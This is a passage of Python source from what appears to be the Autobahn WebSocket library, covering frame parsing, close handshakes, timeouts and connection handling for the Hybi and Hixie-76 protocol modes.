self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
elif self.maxFramePayloadSize > 0 and length > self.maxFramePayloadSize:
self.wasMaxFramePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_POLICY_VIOLATION, "frame exceeds payload limit of %d octets" % self.maxFramePayloadSize)
def onMessageFrameData(self, payload):
"""
Callback when receiving data witin message frame. Default implementation will
buffer data for frame. Override in derived class.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Partial payload for message frame.
:type payload: str
"""
if not self.failedByMe:
if self.websocket_version == 0:
self.message_data_total_length += len(payload)
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
self.message_data.append(payload)
else:
self.frame_data.append(payload)
def onMessageFrameEnd(self):
"""
Callback when a message frame has been completely received. Default implementation
will flatten the buffered frame data and callback onMessageFrame. Override
in derived class.
Modes: Hybi
"""
if not self.failedByMe:
self.onMessageFrame(self.frame_data, self.frame_reserved)
self.frame_data = None
def onMessageFrame(self, payload, reserved):
"""
Callback fired when complete message frame has been received. Default implementation
will buffer frame for message. Override in derived class.
Modes: Hybi
:param payload: Message frame payload.
:type payload: list of str
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
if not self.failedByMe:
self.message_data.extend(payload)
def onMessageEnd(self):
"""
Callback when a message has been completely received. Default implementation
will flatten the buffered frames and callback onMessage. Override
in derived class.
Modes: Hybi, Hixie
"""
if not self.failedByMe:
payload = ''.join(self.message_data)
if self.trackedTimings:
self.trackedTimings.track("onMessage")
self.onMessage(payload, self.message_opcode == WebSocketProtocol.MESSAGE_TYPE_BINARY)
self.message_data = None
def onMessage(self, payload, binary):
"""
Callback when a complete message was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi, Hixie
:param payload: Message payload (UTF-8 encoded text string or binary string). Can also be an empty string, when message contained no payload.
:type payload: str
:param binary: If True, payload is binary, otherwise text.
:type binary: bool
"""
if self.debug:
log.msg("WebSocketProtocol.onMessage")
def onPing(self, payload):
"""
Callback when Ping was received. Default implementation responds
with a Pong. Override in derived class.
Modes: Hybi
:param payload: Payload of Ping, when there was any. Can be arbitrary, up to 125 octets.
:type payload: str
"""
if self.debug:
log.msg("WebSocketProtocol.onPing")
if self.state == WebSocketProtocol.STATE_OPEN:
self.sendPong(payload)
def onPong(self, payload):
"""
Callback when Pong was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi
:param payload: Payload of Pong, when there was any. Can be arbitrary, up to 125 octets.
"""
if self.debug:
log.msg("WebSocketProtocol.onPong")
def onClose(self, wasClean, code, reason):
"""
Callback when the connection has been closed. Override in derived class.
Modes: Hybi, Hixie
:param wasClean: True, iff the connection was closed cleanly.
:type wasClean: bool
:param code: None or close status code (sent by peer), if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
:param reason: None or close reason (sent by peer) (when present, a status code MUST have been also be present).
:type reason: str
"""
if self.debugCodePaths:
s = "WebSocketProtocol.onClose:\n"
s += "wasClean=%s\n" % wasClean
s += "code=%s\n" % code
s += "reason=%s\n" % reason
s += "self.closedByMe=%s\n" % self.closedByMe
s += "self.failedByMe=%s\n" % self.failedByMe
s += "self.droppedByMe=%s\n" % self.droppedByMe
s += "self.wasClean=%s\n" % self.wasClean
s += "self.wasNotCleanReason=%s\n" % self.wasNotCleanReason
s += "self.localCloseCode=%s\n" % self.localCloseCode
s += "self.localCloseReason=%s\n" % self.localCloseReason
s += "self.remoteCloseCode=%s\n" % self.remoteCloseCode
s += "self.remoteCloseReason=%s\n" % self.remoteCloseReason
log.msg(s)
def onCloseFrame(self, code, reasonRaw):
"""
Callback when a Close frame was received. The default implementation answers by
sending a Close when no Close was sent before. Otherwise it drops
the TCP connection either immediately (when we are a server) or after a timeout
(when we are a client and expect the server to drop the TCP).
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonRaw are silently ignored.
:param code: None or close status code, if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
:param reason: None or close reason (when present, a status code MUST have been also be present).
:type reason: str
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onCloseFrame")
self.remoteCloseCode = code
self.remoteCloseReason = reasonRaw
## reserved close codes: 0-999, 1004, 1005, 1006, 1011-2999, >= 5000
##
if code is not None and (code < 1000 or (code >= 1000 and code <= 2999 and code not in WebSocketProtocol.CLOSE_STATUS_CODES_ALLOWED) or code >= 5000):
if self.protocolViolation("invalid close code %d" % code):
return True
## closing reason
##
if reasonRaw is not None:
## we use our own UTF-8 validator to get consistent and fully conformant
## UTF-8 validation behavior
u = Utf8Validator()
val = u.validate(reasonRaw)
if not val[0]:
if self.invalidPayload("invalid close reason (non-UTF-8 payload)"):
return True
if self.state == WebSocketProtocol.STATE_CLOSING:
## We already initiated the closing handshake, so this
## is the peer's reply to our close frame.
## cancel any closing HS timer if present
##
if self.closeHandshakeTimeoutCall is not None:
if self.debugCodePaths:
log.msg("closeHandshakeTimeoutCall.cancel")
self.closeHandshakeTimeoutCall.cancel()
self.closeHandshakeTimeoutCall = None
self.wasClean = True
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = True)
else:
## When we are a client, the server should drop the TCP
## If that doesn't happen, we do. And that will set wasClean = False.
if self.serverConnectionDropTimeout > 0:
self.serverConnectionDropTimeoutCall = reactor.callLater(self.serverConnectionDropTimeout, self.onServerConnectionDropTimeout)
elif self.state == WebSocketProtocol.STATE_OPEN:
## The peer initiates a closing handshake, so we reply
## by sending close frame.
self.wasClean = True
if self.websocket_version == 0:
self.sendCloseFrame(isReply = True)
else:
## Either reply with same code/reason, or code == NORMAL/reason=None
if self.echoCloseCodeReason:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = True)
else:
self.sendCloseFrame(code = WebSocketProtocol.CLOSE_STATUS_CODE_NORMAL, isReply = True)
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = False)
else:
## When we are a client, we expect the server to drop the TCP,
## and when the server fails to do so, a timeout in sendCloseFrame()
## will set wasClean = False back again.
pass
else:
## STATE_PROXY_CONNECTING, STATE_CONNECTING, STATE_CLOSED
raise Exception("logic error")
def onServerConnectionDropTimeout(self):
"""
We (a client) expected the peer (a server) to drop the connection,
but it didn't (in time self.serverConnectionDropTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
self.serverConnectionDropTimeoutCall = None
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onServerConnectionDropTimeout")
self.wasClean = False
self.wasNotCleanReason = "server did not drop TCP connection (in time)"
self.wasServerConnectionDropTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onServerConnectionDropTimeout since connection is already closed")
def onOpenHandshakeTimeout(self):
"""
We expected the peer to complete the opening handshake with to us.
It didn't do so (in time self.openHandshakeTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
self.openHandshakeTimeoutCall = None
if self.state in [WebSocketProtocol.STATE_CONNECTING, WebSocketProtocol.STATE_PROXY_CONNECTING]:
if self.debugCodePaths:
log.msg("onOpenHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not finish (in time) the opening handshake"
self.wasOpenHandshakeTimeout = True
self.dropConnection(abort = True)
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is open (opening handshake already finished)")
elif self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection already closed")
else:
# should not arrive here
raise Exception("logic error")
def onCloseHandshakeTimeout(self):
"""
We expected the peer to respond to us initiating a close handshake. It didn't
respond (in time self.closeHandshakeTimeout) with a close response frame though.
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
self.closeHandshakeTimeoutCall = None
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onCloseHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not respond (in time) in closing handshake"
self.wasCloseHandshakeTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onCloseHandshakeTimeout since connection is already closed")
def dropConnection(self, abort = False):
"""
Drop the underlying TCP connection. For abort parameter, see:
* http://twistedmatrix.com/documents/current/core/howto/servers.html#auto2
* https://github.com/tavendo/AutobahnPython/issues/96
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("dropping connection")
self.droppedByMe = True
self.state = WebSocketProtocol.STATE_CLOSED
if abort:
self.transport.abortConnection()
else:
self.transport.loseConnection()
else:
if self.debugCodePaths:
log.msg("skipping dropConnection since connection is already closed")
def failConnection(self, code = CLOSE_STATUS_CODE_GOING_AWAY, reason = "Going Away"):
"""
Fails the WebSocket connection.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, the code and reason are silently ignored.
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("Failing connection : %s - %s" % (code, reason))
self.failedByMe = True
if self.failByDrop:
## brutally drop the TCP connection
self.wasClean = False
self.wasNotCleanReason = "I failed the WebSocket connection by dropping the TCP connection"
self.dropConnection(abort = True)
else:
## perform WebSocket closing handshake
if self.state != WebSocketProtocol.STATE_CLOSING:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = False)
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closing")
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closed")
def protocolViolation(self, reason):
"""
Fired when a WebSocket protocol violation/error occurs.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: Protocol violation that was encountered (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Protocol violation : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_PROTOCOL_ERROR, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def invalidPayload(self, reason):
"""
Fired when invalid payload is encountered. Currently, this only happens
for text message when payload is invalid UTF-8 or close frames with
close reason that is invalid UTF-8.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: What was invalid for the payload (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Invalid payload : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_INVALID_PAYLOAD, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def setTrackTimings(self, enable):
"""
Enable/disable tracking of detailed timings.
:param enable: Turn time tracking on/off.
:type enable: bool
"""
if not hasattr(self, 'trackTimings') or self.trackTimings != enable:
self.trackTimings = enable
if self.trackTimings:
self.trackedTimings = Timings()
else:
self.trackedTimings = None
def doTrack(self, msg):
if not hasattr(self, 'trackTimings') or not self.trackTimings:
return
self.trackedTimings.track(msg)
def connectionMade(self):
"""
This is called by Twisted framework when a new TCP connection has been established
and handed over to a Protocol instance (an instance of this class).
Modes: Hybi, Hixie
"""
## copy default options from factory (so we are not affected by changed on those)
##
self.debug = self.factory.debug
self.debugCodePaths = self.factory.debugCodePaths
self.logOctets = self.factory.logOctets
self.logFrames = self.factory.logFrames
self.setTrackTimings(self.factory.trackTimings)
self.allowHixie76 = self.factory.allowHixie76
self.utf8validateIncoming = self.factory.utf8validateIncoming
self.applyMask = self.factory.applyMask
self.maxFramePayloadSize = self.factory.maxFramePayloadSize
self.maxMessagePayloadSize = self.factory.maxMessagePayloadSize
self.autoFragmentSize = self.factory.autoFragmentSize
self.failByDrop = self.factory.failByDrop
self.echoCloseCodeReason = self.factory.echoCloseCodeReason
self.openHandshakeTimeout = self.factory.openHandshakeTimeout
self.closeHandshakeTimeout = self.factory.closeHandshakeTimeout
self.tcpNoDelay = self.factory.tcpNoDelay
if self.isServer:
self.versions = self.factory.versions
self.webStatus = self.factory.webStatus
self.requireMaskedClientFrames = self.factory.requireMaskedClientFrames
self.maskServerFrames = self.factory.maskServerFrames
else:
self.version = self.factory.version
self.acceptMaskedServerFrames = self.factory.acceptMaskedServerFrames
self.maskClientFrames = self.factory.maskClientFrames
self.serverConnectionDropTimeout = self.factory.serverConnectionDropTimeout
## Set "Nagle"
self.transport.setTcpNoDelay(self.tcpNoDelay)
## the peer we are connected to
self.peer = self.transport.getPeer()
self.peerstr = "%s:%d" % (self.peer.host, self.peer.port)
## initial state
if not self.isServer and self.factory.proxy is not None:
self.state = WebSocketProtocol.STATE_PROXY_CONNECTING
else:
self.state = WebSocketProtocol.STATE_CONNECTING
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
self.data = ""
## for chopped/synched sends, we need to queue to maintain
## ordering when recalling the reactor to actually "force"
## the octets to wire (see test/trickling in the repo)
self.send_queue = deque()
self.triggered = False
## incremental UTF8 validator
self.utf8validator = Utf8Validator()
## track when frame/message payload sizes (incoming) were exceeded
self.wasMaxFramePayloadSizeExceeded = False
self.wasMaxMessagePayloadSizeExceeded = False
## the following vars are related to connection close handling/tracking
# True, iff I have initiated closing HS (that is, did send close first)
self.closedByMe = False
# True, iff I have failed the WS connection (i.e. due to protocol error)
# Failing can be either by initiating close HS or brutal drop (this is
# controlled by failByDrop option)
self.failedByMe = False
# True, iff I dropped the TCP connection (called transport.loseConnection())
self.droppedByMe = False
# True, iff full WebSocket closing handshake was performed (close frame sent
# and received) _and_ the server dropped the TCP (which is its responsibility)
self.wasClean = False
# When self.wasClean = False, the reason (what happened)
self.wasNotCleanReason = None
# When we are a client, and we expected the server to drop the TCP, but that
# didn't happen in time, this gets True
self.wasServerConnectionDropTimeout = False
# When the initial WebSocket opening handshake times out, this gets True
self.wasOpenHandshakeTimeout = False
# When we initiated a closing handshake, but the peer did not respond in
# time, this gets True
self.wasCloseHandshakeTimeout = False
# The close code I sent in close frame (if any)
self.localCloseCode = None
# The close reason I sent in close frame (if any)
self.localCloseReason = None
# The close code the peer sent me in close frame (if any)
self.remoteCloseCode = None
# The close reason the peer sent me in close frame (if any)
self.remoteCloseReason = None
# timers, which might get set up later, and remembered here to get canceled
# when appropriate
if not self.isServer:
self.serverConnectionDropTimeoutCall = None
self.openHandshakeTimeoutCall = None
self.closeHandshakeTimeoutCall = None
# set opening handshake timeout handler
if self.openHandshakeTimeout > 0:
self.openHandshakeTimeoutCall = reactor.callLater(self.openHandshakeTimeout, self.onOpenHandshakeTimeout)
def connectionLost(self, reason):
"""
This is called by Twisted framework when a TCP connection was lost.
Modes: Hybi, Hixie
"""
## cancel any server connection drop timer if present
##
if not self.isServer and self.serverConnectionDropTimeoutCall is not None:
if self.debugCodePaths:
log.msg("serverConnectionDropTimeoutCall.cancel")
self.serverConnectionDropTimeoutCall.cancel()
self.serverConnectionDropTimeoutCall = None
self.state = WebSocketProtocol.STATE_CLOSED
if not self.wasClean:
if not self.droppedByMe and self.wasNotCleanReason is None:
self.wasNotCleanReason = "peer dropped the TCP connection without previous WebSocket closing handshake"
self.onClose(self.wasClean, WebSocketProtocol.CLOSE_STATUS_CODE_ABNORMAL_CLOSE, "connection was closed uncleanly (%s)" % self.wasNotCleanReason)
else:
self.onClose(self.wasClean, self.remoteCloseCode, self.remoteCloseReason)
def logRxOctets(self, data):
"""
Hook fired right after raw octets have been received, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("RX Octets from %s : octets = %s" % (self.peerstr, binascii.b2a_hex(data)))
def logTxOctets(self, data, sync):
"""
Hook fired right after raw octets have been sent, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("TX Octets to %s : sync = %s, octets = %s" % (self.peerstr, sync, binascii.b2a_hex(data)))
def logRxFrame(self, frameHeader, payload):
"""
Hook fired right after WebSocket frame has been received and decoded, but only when self.logFrames == True.
Modes: Hybi
"""
data = ''.join(payload)
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
data if frameHeader.opcode == 1 else binascii.b2a_hex(data))
log.msg("RX Frame from %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, payload = %s" % info)
def logTxFrame(self, frameHeader, payload, repeatLength, chopsize, sync):
"""
Hook fired right after WebSocket frame has been encoded and sent, but only when self.logFrames == True.
Modes: Hybi
"""
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
repeatLength,
chopsize,
sync,
payload if frameHeader.opcode == 1 else binascii.b2a_hex(payload))
log.msg("TX Frame to %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, repeat_length = %s, chopsize = %s, sync = %s, payload = %s" % info)
def dataReceived(self, data):
"""
This is called by Twisted framework upon receiving data on TCP connection.
Modes: Hybi, Hixie
"""
if self.logOctets:
self.logRxOctets(data)
self.data += data
self.consumeData()
def consumeData(self):
"""
Consume buffered (incoming) data.
Modes: Hybi, Hixie
"""
## WebSocket is open (handshake was completed) or close was sent
##
if self.state == WebSocketProtocol.STATE_OPEN or self.state == WebSocketProtocol.STATE_CLOSING:
## process until no more buffered data left or WS was closed
##
while self.processData() and self.state != WebSocketProtocol.STATE_CLOSED:
pass
## need to establish proxy connection
##
elif self.state == WebSocketProtocol.STATE_PROXY_CONNECTING:
self.processProxyConnect()
## WebSocket needs handshake
##
elif self.state == WebSocketProtocol.STATE_CONNECTING:
## the implementation of processHandshake() in derived
## class needs to perform client or server handshake
## from other party here ..
##
self.processHandshake()
## we failed the connection .. don't process any more data!
##
elif self.state == WebSocketProtocol.STATE_CLOSED:
## ignore any data received after WS was closed
##
if self.debugCodePaths:
log.msg("received data in STATE_CLOSED")
## should not arrive here (invalid state)
##
else:
raise Exception("invalid state")
def processProxyConnect(self):
"""
Process proxy connect.
Modes: Hybi, Hixie
"""
raise Exception("must implement proxy connect (client or server) in derived class")
def processHandshake(self):
"""
Process WebSocket handshake.
Modes: Hybi, Hixie
"""
raise Exception("must implement handshake (client or server) in derived class")
def registerProducer(self, producer, streaming):
"""
Register a Twisted producer with this protocol.
Modes: Hybi, Hixie
:param producer: A Twisted push or pull producer.
:type producer: object
:param streaming: Producer type.
:type streaming: bool
"""
self.transport.registerProducer(producer, streaming)
def _trigger(self):
"""
Trigger sending stuff from send queue (which is only used for chopped/synched writes).
Modes: Hybi, Hixie
"""
if not self.triggered:
self.triggered = True
self._send()
def _send(self):
"""
Send out stuff from send queue. For details how this works, see test/trickling
in the repo.
Modes: Hybi, Hixie
"""
if len(self.send_queue) > 0:
e = self.send_queue.popleft()
if self.state != WebSocketProtocol.STATE_CLOSED:
self.transport.write(e[0])
if self.logOctets:
self.logTxOctets(e[0], e[1])
else:
if self.debugCodePaths:
log.msg("skipped delayed write, since connection is closed")
# we need to reenter the reactor to make the latter
# reenter the OS network stack, so that octets
# can get on the wire. Note: this is a "heuristic",
# since there is no (easy) way to really force out
# octets from the OS network stack to wire.
reactor.callLater(WebSocketProtocol._QUEUED_WRITE_DELAY, self._send)
else:
self.triggered = False
def sendData(self, data, sync = False, chopsize = None):
"""
Wrapper for self.transport.write which allows to give a chopsize.
When asked to chop up writing to TCP stream, we write only chopsize octets
and then give up control to select() in underlying reactor so that bytes
get onto wire immediately. Note that this is different from and unrelated
to WebSocket data message fragmentation. Note that this is also different
from the TcpNoDelay option which can be set on the socket.
Modes: Hybi, Hixie
"""
if chopsize and chopsize > 0:
i = 0
n = len(data)
done = False
while not done:
j = i + chopsize
if j >= n:
done = True
j = n
self.send_queue.append((data[i:j], True))
i += chopsize
self._trigger()
else:
if sync or len(self.send_queue) > 0:
self.send_queue.append((data, sync))
self._trigger()
else:
self.transport.write(data)
if self.logOctets:
self.logTxOctets(data, False)
def sendPreparedMessage(self, preparedMsg):
"""
Send a message that was previously prepared with
WebSocketFactory.prepareMessage().
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
self.sendData(preparedMsg.payloadHixie)
else:
self.sendData(preparedMsg.payloadHybi)
def processData(self):
"""
After WebSocket handshake has been completed, this procedure will do all
subsequent processing of incoming bytes.
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
return self.processDataHixie76()
else:
return self.processDataHybi()
def processDataHixie76(self):
"""
Hixie-76 incoming data processing.
Modes: Hixie
"""
buffered_len = len(self.data)
## outside a message, that is we are awaiting data which starts a new message
##
if not self.inside_message:
if buffered_len >= 2:
## new message
##
if self.data[0] == '\x00':
self.inside_message = True
if self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
self.data = self.data[1:]
if self.trackedTimings:
self.trackedTimings.track("onMessageBegin")
self.onMessageBegin(1)
## Hixie close from peer received
##
elif self.data[0] == '\xff' and self.data[1] == '\x00':
self.onCloseFrame(None, None)
self.data = self.data[2:]
# stop receiving/processing after having received close!
return False
## malformed data
##
else:
if self.protocolViolation("malformed data received"):
return False
else:
## need more data
return False
end_index = self.data.find('\xff')
if end_index > 0:
payload = self.data[:end_index]
self.data = self.data[end_index + 1:]
else:
payload = self.data
self.data = ''
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
if end_index > 0:
self.inside_message = False
self.onMessageEnd()
return len(self.data) > 0
def processDataHybi(self):
"""
RFC6455/Hybi-Drafts incoming data processing.
Modes: Hybi
"""
buffered_len = len(self.data)
## outside a frame, that is we are awaiting data which starts a new frame
##
if self.current_frame is None:
## need minimum of 2 octets to for new frame
##
if buffered_len >= 2:
## FIN, RSV, OPCODE
##
b = ord(self.data[0])
frame_fin = (b & 0x80) != 0
frame_rsv = (b & 0x70) >> 4
frame_opcode = b & 0x0f
## MASK, PAYLOAD LEN 1
##
b = ord(self.data[1])
frame_masked = (b & 0x80) != 0
frame_payload_len1 = b & 0x7f
## MUST be 0 when no extension defining
## the semantics of RSV has been negotiated
##
if frame_rsv != 0:
if self.protocolViolation("RSV != 0 and no extension negotiated"):
return False
## all client-to-server frames MUST be masked
##
if self.isServer and self.requireMaskedClientFrames and not frame_masked:
if self.protocolViolation("unmasked client-to-server frame"):
return False
## all server-to-client frames MUST NOT be masked
##
if not self.isServer and not self.acceptMaskedServerFrames and frame_masked:
if self.protocolViolation("masked server-to-client frame"):
return False
## check frame
##
if frame_opcode > 7: # control frame (have MSB in opcode set)
## control frames MUST NOT be fragmented
##
if not frame_fin:
if self.protocolViolation("fragmented control frame"):
return False
## control frames MUST have payload 125 octets or less
##
if frame_payload_len1 > 125:
if self.protocolViolation("control frame with payload length > 125 octets"):
return False
## check for reserved control frame opcodes
##
if frame_opcode not in [8, 9, 10]:
if self.protocolViolation("control frame using reserved opcode %d" % frame_opcode):
return False
## close frame : if there is a body, the first two bytes of the body MUST be a 2-byte
## unsigned integer (in network byte order) representing a status code
##
if frame_opcode == 8 and frame_payload_len1 == 1:
if self.protocolViolation("received close control frame with payload len 1"):
return False
else: # data frame
## check for reserved data frame opcodes
##
if frame_opcode not in [0, 1, 2]:
if self.protocolViolation("data frame using reserved opcode %d" % frame_opcode):
return False
## check opcode vs message fragmentation state 1/2
##
if not self.inside_message and frame_opcode == 0:
if self.protocolViolation("received continuation data frame outside fragmented message"):
return False
## check opcode vs message fragmentation state 2/2
##
if self.inside_message and frame_opcode != 0:
if self.protocolViolation("received non-continuation data frame while inside fragmented message"):
return False
## compute complete header length
##
if frame_masked:
mask_len = 4
else:
mask_len = 0
if frame_payload_len1 < 126:
frame_header_len = 2 + mask_len
elif frame_payload_len1 == 126:
frame_header_len = 2 + 2 + mask_len
elif frame_payload_len1 == 127:
frame_header_len = 2 + 8 + mask_len
else:
raise Exception("logic error")
## only proceed when we have enough data buffered for complete
## frame header (which includes extended payload len + mask)
##
if buffered_len >= frame_header_len:
## minimum frame header length (already consumed)
##
i = 2
## extract extended payload length
##
if frame_payload_len1 == 126:
frame_payload_len = struct.unpack("!H", self.data[i:i+2])[0]
if frame_payload_len < 126:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 2
elif frame_payload_len1 == 127:
frame_payload_len = struct.unpack("!Q", self.data[i:i+8])[0]
if frame_payload_len > 0x7FFFFFFFFFFFFFFF: # 2**63
if self.protocolViolation("invalid data frame length (>2^63)"):
return False
if frame_payload_len < 65536:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 8
else:
frame_payload_len = frame_payload_len1
## when payload is masked, extract frame mask
##
frame_mask = None
if frame_masked:
frame_mask = self.data[i:i+4]
i += 4
if frame_masked and frame_payload_len > 0 and self.applyMask:
self.current_frame_masker = createXorMasker(frame_mask, frame_payload_len)
else:
self.current_frame_masker = XorMaskerNull()
## remember rest (payload of current frame after header and everything thereafter)
##
self.data = self.data[i:]
## ok, got complete frame header
##
self.current_frame = FrameHeader(frame_opcode,
frame_fin,
frame_rsv,
frame_payload_len,
frame_mask)
## process begin on new frame
##
self.onFrameBegin()
## reprocess when frame has no payload or and buffered data left
##
return frame_payload_len == 0 or len(self.data) > 0
else:
return False # need more data
else:
return False # need more data
## inside a started frame
##
else:
## cut out rest of frame payload
##
rest = self.current_frame.length - self.current_frame_masker.pointer()
if buffered_len >= rest:
data = self.data[:rest]
length = rest
self.data = self.data[rest:]
else:
data = self.data
length = buffered_len
self.data = ""
if length > 0:
## unmask payload
##
payload = self.current_frame_masker.process(data)
## process frame data
##
fr = self.onFrameData(payload)
if fr == False:
return False
## fire frame end handler when frame payload is complete
##
if self.current_frame_masker.pointer() == self.current_frame.length:
fr = self.onFrameEnd()
if fr == False:
return False
## reprocess when no error occurred and buffered data left
##
return len(self.data) > 0
def onFrameBegin(self):
"""
Begin of receive new frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data = []
else:
## new message started
##
if not self.inside_message:
self.inside_message = True
if self.current_frame.opcode == WebSocketProtocol.MESSAGE_TYPE_TEXT and self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
if self.trackedTimings:
self.trackedTimings.track("onMessageBegin")
self.onMessageBegin(self.current_frame.opcode)
self.onMessageFrameBegin(self.current_frame.length, self.current_frame.rsv)
def onFrameData(self, payload):
"""
New data received within frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data.append(payload)
else:
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
def onFrameEnd(self):
"""
End of frame received.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
if self.logFrames:
self.logRxFrame(self.current_frame, self.control_frame_data)
self.processControlFrame()
else:
if self.logFrames:
self.logRxFrame(self.current_frame, self.frame_data)
self.onMessageFrameEnd()
if self.current_frame.fin:
if self.utf8validateIncomingCurrentMessage:
if not self.utf8validateLast[1]:
if self.invalidPayload("UTF-8 text message payload ended within Unicode code point at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageEnd()
self.inside_message = False
self.current_frame = None
def processControlFrame(self):
"""
Process a completely received control frame.
Modes: Hybi
"""
payload = ''.join(self.control_frame_data)
self.control_frame_data = None
## CLOSE frame
##
if self.current_frame.opcode == 8:
code = None
reasonRaw = None
ll = len(payload)
if ll > 1:
code = struct.unpack("!H", payload[0:2])[0]
if ll > 2:
reasonRaw = payload[2:]
if self.onCloseFrame(code, reasonRaw):
return False
## PING frame
##
elif self.current_frame.opcode == 9:
self.onPing(payload)
## PONG frame
##
elif self.current_frame.opcode == 10:
self.onPong(payload)
else:
## we might arrive here, when protocolViolation
## wants us to continue anyway
pass
return True
def sendFrame(self, opcode, payload = "", fin = True, rsv = 0, mask = None, payload_len = None, chopsize = None, sync = False):
"""
Send out frame. Normally only used internally via sendMessage(), sendPing(), sendPong() and sendClose().
This method deliberately allows to send invalid frames (that is frames invalid
per-se, or frames invalid because of protocol state). Other than in fuzzing servers,
calling methods will ensure that no invalid frames are sent.
In addition, this method supports explicit specification of payload length.
When payload_len is given, it will always write that many octets to the stream.
It'll wrap within payload, resending parts of that when more octets were requested
The use case is again for fuzzing server which want to sent increasing amounts
of payload data to peers without having to construct potentially large messges
themselfes.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if payload_len is not None:
if len(payload) < 1:
